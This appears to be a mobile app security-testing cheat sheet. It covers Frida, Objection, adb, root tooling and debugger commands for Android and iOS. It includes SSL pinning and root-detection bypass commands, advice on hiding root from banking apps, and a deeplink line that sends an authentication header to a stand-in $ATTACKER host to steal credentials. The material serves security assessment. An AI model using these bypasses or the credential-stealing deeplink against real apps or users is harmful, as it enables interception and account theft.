Dynamic Analysis for Android and iOS

Learn Cybersecurity for FREE

Android emulators

Frameworks for Dynamic Analysis


Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.


  • Python 3
sudo pip install frida-tools



Launch SnapChat and trace crypto API calls:

frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"

Intercept system calls open() and strcmp():

frida-trace -U -i open -i strcmp -f $PACKAGE

Trace an Obj-C methods (iOS):

frida-trace -U -m "-[NSView drawRect:]" -f $PACKAGE
frida-trace -U -m "*[$CLASS *]" -f $PACKAGE

Download and install server in the phone:

Run the server in the mobile phone:

adb shell su -c "/data/local/tmp/frida-server" &



Objection (frida)

Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture ”without the need for a jailbroken or rooted mobile device”.

git clone https://github.com/sensepost/objection
cd objection
pip3 install objection

SSL pining bypass for iOS:

objection -N explore -q
# ios sslpinning disable

SSL pining bypass for Android:

objection -N explore -q
# android sslpinning disable


Fridump (frida)


Frameworks for iOS

Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.


  • Jailbroken device
  • Cydia
  • Apt 0.7 Strict


Frameworks for Android


Android Factory/OTA images

python3 extract_android_ota_payload/extract_android_ota_payload.py payload.bin . 
Extracting 'boot.img'
Extracting 'system.img'
Extracting 'vbmeta.img'
Extracting 'dtbo.img'
Extracting 'vendor.img'
Extracting 'abl.img'
Extracting 'aop.img'
Extracting 'cmnlib.img'
Extracting 'cmnlib64.img'
Extracting 'devcfg.img'
Extracting 'hyp.img'
Extracting 'keymaster.img'
Extracting 'qupfw.img'
Extracting 'tz.img'
Extracting 'xbl.img'
Extracting 'xbl_config.img'
Extracting 'modem.img'


Framework that can change the behaviour of the system and apps without touching any APKs



drozer console connect



Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process’s memory.



Magisk is a suite of open source tools for customizing Android, supporting devices higher than Android 4.2. It covers fundamental parts of Android customization: root, boot scripts, SELinux patches, AVB2.0 / dm-verity / forceencrypt removals etc.

Tool that helps you to root your phone and has cool features such as hide to an app that the phone is rooted so you can run it (i.e. bank apps)

Useful commands using adb

Get Android properties:

adb shell getprop

Get Android Version:

adb shell getprop ro.build.version.release

Get CPU type:

adb shell ro.product.cpu.abi

Set debuggable property to 1:

resetprop ro.debuggable 1

Make an screenshot of the phone screen:

adb shell screencap -p /sdcard/Download/screencap.png

Make an screencast of the screen in real time:

adb shell screenrecord –bit-rate 12000000 /sdcard/Download/screen.mp4

Deeplinks analysis:

adb shell dumpsys $PACKAGE domain-preferred-apps

List installed packages:

adb shell pm list packages -f

Path to the apk file:

adb shell pm path $PACKAGE

Show recent apps:

adb shell dumpsys activity recents

Install app in the phone:

adb install $APK

To install an app with Android App Bundles, otherwise you will get Failure [INSTALL_FAILED_VERIFICATION_FAILURE] error. Warning: All apks must be signed using the same key:

adb install-multiple base.apk $APK1.apk $APK2.apk

Other useful resources inside the package data:

  • /data/data/$PACKAGE/shared_prefs/


Root detection

Bypassing Root Detection:

frida --codeshare dzonerzy/fridantiroot -f $PACKAGE

Root Detection:

SSL Unpinning articles and tools

Xposed Module: Just Trust Me: Xposed Module to bypass SSL certificate pinning.

adb install ./JustTrustMe.apk

Xposed Module: SSLUnpinning Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).

adb install mobi.acpm.sslunpinning_latest.apk

Cydia Substrate Module: Android SSL Trust Killer: Blackbox tool to bypass SSL certificate pinning for most applications running on a device.

adb install Android-SSL-TrustKiller.apk

Bypassing SSL Pinning with Frida

frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f $PACKAGE
frida -U -f $PACKAGE -l universal-android-ssl-pinning-bypass-with-frida.js --no-pause

Notes on certificate pinning on Android

As we know, usually certificate pinning does not link to an specific certificate but all the trusted certificates installed in the system. Therefore, if we installed the burpsuite certificate and trust it in the mobile phone, we will be able to break SSL and intercept all the traffic in plain text using burp. However, starting in Android 7 all apps only trust system Certificate Authorities (CA) by default, and distrust user installed CAs certificates. That mean that we can still break SSL when browsing HTTPS websites with Chrome, Firefox, etc BUT we cannot intercept HTTPS connections made from the apps.

To bypass this, we can from the static analysis, add in AndroidManifest.xml that we explicitly allow user installed CAs:

<application android:networkSecurityConfig="@xml/network_security_config">

Inside the res/xml/network_security_config file:

<?xml version="1.0" encoding="utf-8"?>
        <domain includeSubdomains="true">example.com</domain>
            <certificates src="@raw/my_ca"/>
            <certificates src="system"/>
            <certificates src="user"/>
        <pin-set expiration="2018-01-01">
            <pin digest="SHA-256">7HIpactkIAq2Y49orFOOQKurWxmmSFZhBCoQYcRhJ3Y=</pin>
            <!-- backup pin -->
            <pin digest="SHA-256">fwza0LRMXouZHRC8Ei+4PyuldPDcf3UKgO/04cDM1oE=</pin>

Or dynamically, use frida to hijack call SSLContext and attach the trusted keystores that we want to. See https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

Other references:

Install Burpsuite certificate in system CAs (< Android 10)

openssl x509 -inform DER -in cacert.der -out cacert.pem
HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb push cacert.pem /sdcard/Download/$HASH.0
adb shell su -c "mount -o rw,remount /system"
adb shell su -c "mv /sdcard/Download/$HASH.0 /system/etc/security/cacerts/
adb shell su -c "chmod 644 /system/etc/security/cacerts/$HASH.0"

Invoke deeplinks manually

Howto use open redirect to steal credentials:

adb shell am start -a android.intent.action.VIEW $INTENT://$DEEPLINK?$PARAM=https://$ATTACKER --ez authentication_header true

Debuggers for Android


First recompile the package with the android:debuggable=”true”

Shows PIDs with debuggable enabled:

adb jdwp

Then do port forwarding to the external port and attach to the process:

adb forward tcp:7777 jdwp:$PID
{echo "suspend"; cat;} | jdb -attach localhost:7777

Useful jdb commands:

  • classes: Lists all classes
  • methods $CLASS: List methods of a class
  • stop in $CLASS.func(): Set a breakpoint in func()
main[1] locals
main[1] next
main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("pwd").getInputStream())).readLine())
main[1] print name
main[1] set name="foo"
main[1] list
main[1] where
main[1] cont

Instead to repackage an apk to make it debuggable, try:

$ adb shell
sailfish:/ $ su
sailfish:/ # resetprop ro.debuggable 1
sailfish:/ # stop
sailfish:/ # start
sailfish:/ # exit
sailfish:/ $ exit
$ adb shell am set-debug-app -w 

Enable persistent flag:

adb shell am set-debug-app -w --persistent

Undo persistent flag:

adb shell am clear-debug-app


adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp
/data/local/tmp/gdbserver --attach localhost:1234 $PID